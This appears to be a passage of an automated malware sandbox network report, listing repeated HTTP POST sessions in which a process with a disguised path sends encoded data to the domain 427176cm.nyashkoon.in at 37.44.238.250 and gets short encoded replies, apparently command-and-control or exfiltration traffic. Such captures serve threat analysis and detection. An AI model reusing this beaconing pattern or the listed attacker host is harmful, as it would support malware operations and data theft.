                                        Nov 5, 2024 08:13:49.325248957 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:46 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V
                                        Nov 5, 2024 08:13:49.325334072 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:46 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V
                                        Nov 5, 2024 08:13:49.326008081 CET | 183 | IN | HTTP/1.1 100 Continue


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        107 | 192.168.2.7 | 50077 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:49.447833061 CET | 287 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Nov 5, 2024 08:13:50.272866011 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:50.358350039 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:48 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        108 | 192.168.2.7 | 50078 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:50.493639946 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:51.316674948 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:51.392174006 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:49 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        109 | 192.168.2.7 | 50079 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:51.528162003 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:52.347029924 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:52.428056955 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:50 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        110 | 192.168.2.7 | 50080 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:52.554878950 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1028
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:52.912395954 CET1028OUTData Raw: 5b 58 43 52 59 54 5a 51 5e 5e 54 55 56 5a 5a 5c 5f 5a 59 50 52 50 52 51 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [XCRYTZQ^^TUVZZ\_ZYPRPRQYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-'$$+;]0=&($/;(="W$&$=?38**&G!']*3
                                        Nov 5, 2024 08:13:53.397147894 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:53.473309994 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:51 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        111 | 192.168.2.7 | 50081 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:53.603728056 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:53.958729029 CET1032OUTData Raw: 5b 59 46 5d 59 58 5f 50 5e 5e 54 55 56 58 5a 5e 5f 5b 59 5c 52 51 52 50 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [YF]YX_P^^TUVXZ^_[Y\RQRPYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-'#'[&%!'/8');$7_>0<:X3=3^$87Y*&G!']*/


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        112 | 192.168.2.7 | 50082 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:54.340676069 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1288
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:54.698344946 CET1288OUTData Raw: 5b 55 46 5f 59 59 5f 52 5e 5e 54 55 56 5a 5a 5a 5f 57 59 51 52 51 52 5a 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [UF_YY_R^^TUVZZZ_WYQRQRZYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-$T '1]0"8Z/<[=%0Z0<;[)=U$/2_'= %+?[>:&G!']*+
                                        Nov 5, 2024 08:13:55.169569969 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:55.242516041 CET | 308 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:53 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive
                                        Data Raw: 0d 15 3a 07 24 28 30 13 34 03 21 0e 2a 3d 3c 1e 22 0e 23 5c 38 3d 3b 04 33 33 23 0a 29 06 2e 18 21 3a 3a 58 35 13 3b 05 23 2e 2c 0c 2a 1b 2f 5a 07 10 25 13 26 21 23 53 32 2e 3b 06 24 1d 33 5e 2a 02 3f 00 36 02 3f 12 27 3b 1c 06 25 2a 0a 0a 3b 07 22 0f 2d 06 01 5c 2e 31 20 58 26 1e 2c 54 0d 10 39 56 3d 21 06 11 2a 12 31 5c 31 51 34 56 22 3e 3f 5b 3e 2a 23 0f 3f 3d 25 01 30 09 34 50 21 32 32 0b 31 38 28 13 24 1f 23 0e 24 32 25 55 2c 03 2e 56 0f 30 57 51
                                        Data Ascii: :$(04!*=<"#\8=;33#).!::X5;#.,*/Z%&!#S2.;$3^*?6?';%*;"-\.1 X&,T9V=!*1\1Q4V">?[>*#?=%04P!2218($#$2%U,.V0WQ


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        113 | 192.168.2.7 | 50083 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:54.474334955 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:54.817847967 CET1032OUTData Raw: 5b 55 46 5d 59 5c 5a 55 5e 5e 54 55 56 5b 5a 5c 5f 5b 59 5c 52 59 52 59 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [UF]Y\ZU^^TUV[Z\_[Y\RYRYYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.C3?33T7/] ^)%8^0<+_).Q$/%0'\'(*&G!']*#
                                        Nov 5, 2024 08:13:55.285463095 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:55.355393887 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:53 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        114 | 192.168.2.7 | 50084 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:55.483747959 CET | 287 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Nov 5, 2024 08:13:55.833560944 CET1032OUTData Raw: 5b 58 43 53 59 5e 5a 53 5e 5e 54 55 56 5f 5a 5a 5f 53 59 5d 52 50 52 58 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [XCSY^ZS^^TUV_ZZ_SY]RPRXYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.G02Z3.02(_/+3)%#0,^=&Q$<%'.7X34)&G!']*3
                                        Nov 5, 2024 08:13:56.301719904 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:56.386116028 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:54 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V
                                        Nov 5, 2024 08:13:57.450011969 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:54 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V
                                        Nov 5, 2024 08:13:57.450069904 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:54 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V
                                        Nov 5, 2024 08:13:57.450334072 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:54 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        115 | 192.168.2.7 | 50085 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:57.451988935 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:57.802262068 CET1032OUTData Raw: 5e 58 43 5c 59 55 5f 57 5e 5e 54 55 56 52 5a 5f 5f 53 59 5c 52 5c 52 5e 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^XC\YU_W^^TUVRZ__SY\R\R^YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-0"3*$1(\,#?64Y' =.2$<00+#):&G!']*
                                        Nov 5, 2024 08:13:58.273480892 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:58.354895115 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:56 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        116 | 192.168.2.7 | 50086 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:58.474900007 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:58.834311962 CET1032OUTData Raw: 5e 5a 43 5c 59 5f 5a 5c 5e 5e 54 55 56 5e 5a 5c 5f 5a 59 5a 52 59 52 5a 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^ZC\Y_Z\^^TUV^Z\_ZYZRYRZYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.%230=X0"?88;?%$'< =5',&$-('X=&G!']*7
                                        Nov 5, 2024 08:13:59.287149906 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:59.368043900 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:57 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        117 | 192.168.2.7 | 50087 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:13:59.741625071 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:00.099188089 CET1032OUTData Raw: 5b 55 43 5e 59 5c 5a 52 5e 5e 54 55 56 5f 5a 59 5f 5b 59 59 52 59 52 5e 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [UC^Y\ZR^^TUV_ZY_[YYRYR^YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.A02Y'[=3'/80>580< >=*U%,&X$>7X$(4+:&G!']*3


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        118 | 192.168.2.7 | 50088 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:14:00.261816978 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1276
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:00.614716053 CET1276OUTData Raw: 5b 5a 46 5e 5c 5d 5a 50 5e 5e 54 55 56 5e 5a 59 5f 5a 59 51 52 51 52 50 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [ZF^\]ZP^^TUV^ZY_ZYQRQRPYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-$2 _%=*%2/8,_?50'*==3Y'$(4=&G!']*7
                                        Nov 5, 2024 08:14:01.072973967 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:01.146430969 CET | 308 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:59 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive
                                        Data Raw: 0d 15 3a 07 33 38 24 51 37 3a 2a 51 28 00 38 5a 35 19 06 02 2c 2d 24 1f 33 1d 20 1e 3e 06 22 19 21 29 25 00 36 3d 34 1b 20 3d 3f 57 3e 31 2f 5a 07 10 26 05 31 21 2f 57 25 10 05 01 25 23 2f 5e 28 3c 1d 05 22 02 2f 12 25 3b 1b 5f 26 5c 37 1b 2e 3a 3a 0f 2e 16 30 07 39 57 23 07 31 34 2c 54 0d 10 39 53 28 22 38 53 2a 2c 31 5c 26 27 38 1d 23 3e 33 10 3d 03 27 0b 2b 2d 08 17 27 1e 30 51 21 31 32 0e 25 02 37 05 25 21 06 51 25 18 25 55 2c 03 2e 56 0f 30 57 51
                                        Data Ascii: :38$Q7:*Q(8Z5,-$3 >"!)%6=4 =?W>1/Z&1!/W%%#/^(<"/%;_&\7.::.09W#14,T9S("8S*,1\&'8#>3='+-'0Q!12%7%!Q%%U,.V0WQ


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        119 | 192.168.2.7 | 50089 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:14:00.384543896 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:00.740317106 CET1032OUTData Raw: 5b 5d 43 5c 59 54 5a 5c 5e 5e 54 55 56 58 5a 5a 5f 56 59 5f 52 5c 52 5a 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: []C\YTZ\^^TUVXZZ_VY_R\RZYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.B08Z'3$\8>(Z3<>*W3.^&>;08$=&G!']*/
                                        Nov 5, 2024 08:14:01.219640017 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:01.304662943 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:59 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        120 | 192.168.2.7 | 50090 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:14:01.430138111 CET | 287 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Nov 5, 2024 08:14:01.790092945 CET1032OUTData Raw: 5b 58 43 52 59 5c 5f 56 5e 5e 54 55 56 5d 5a 5b 5f 5b 59 58 52 5a 52 5f 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [XCRY\_V^^TUV]Z[_[YXRZR_YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.$/%.-]$T#;8;)C#'#*..%/*'[;X'4>*&G!']*
                                        Nov 5, 2024 08:14:02.245803118 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:02.331181049 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:00 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        121 | 192.168.2.7 | 50091 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:14:02.463392973 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:02.818649054 CET1032OUTData Raw: 5e 5d 46 5d 59 54 5a 54 5e 5e 54 55 56 5c 5a 5d 5f 50 59 59 52 5d 52 5a 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
